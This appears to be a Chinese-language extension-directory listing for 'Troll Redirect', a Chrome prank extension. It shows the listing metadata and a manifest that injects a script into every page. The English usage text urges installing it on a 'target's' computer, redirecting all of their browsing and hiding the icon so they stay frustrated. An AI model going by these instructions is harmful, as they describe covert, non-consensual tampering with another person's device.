Troll Redirect

Redirect all of your friend's webpages automatically by installing this on their computer!

什么是Troll Redirect?

Troll Redirect是由Aaron Lockhart开发的Chrome扩展程序,该扩展的主要功能是“Redirect all of your friend's webpages automatically by installing this on their computer!”。

扩展截图

screenshot

下载Troll Redirect扩展crx文件

下载Troll Redirect扩展crx格式的文件,手动将Chrome插件安装到浏览器中,也可以将crx文件分享给朋友,轻松安装Chrome插件。

扩展使用说明

                        Troll and prank your friends with this automatically redirecting app! Upon installing it on your target's computer, click the icon and specify the website to which all requests will be redirected. This is guaranteed to frustrate and annoy your target immensely. Then hide the icon in the chrome menu and sit back while your target gets increasingly angry.                    

扩展基本信息

名称 Troll Redirect Troll Redirect
ID micldaecbnddhhcaojamonojfdffegph
官方URL https://chrome.google.com/webstore/detail/troll-redirect/micldaecbnddhhcaojamonojfdffegph
简介 Redirect all of your friend's webpages automatically by installing this on their computer!
文件大小 949 KB
安装次数 192
当前版本 1.0
更新时间 2018-12-06
上架时间 2018-12-02
评分 4.75/5 共4次评分
开发者 Aaron Lockhart
电子邮箱 [email protected]
付费类型 free
支持的语言 en
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "name": "Troll Redirect",
    "version": "1.0",
    "description": "Redirect all of your friend's webpages automatically by installing this on their computer!",
    "manifest_version": 2,
    "author": "Aaron Lockhart",
    "permissions": [
        "tabs",
        "storage"
    ],
    "content_scripts": [
        {
            "matches": [
                "*:\/\/*\/*"
            ],
            "js": [
                "\/src\/troll.js"
            ],
            "run_at": "document_end"
        }
    ],
    "browser_action": {
        "default_popup": "\/src\/popup.html"
    }
}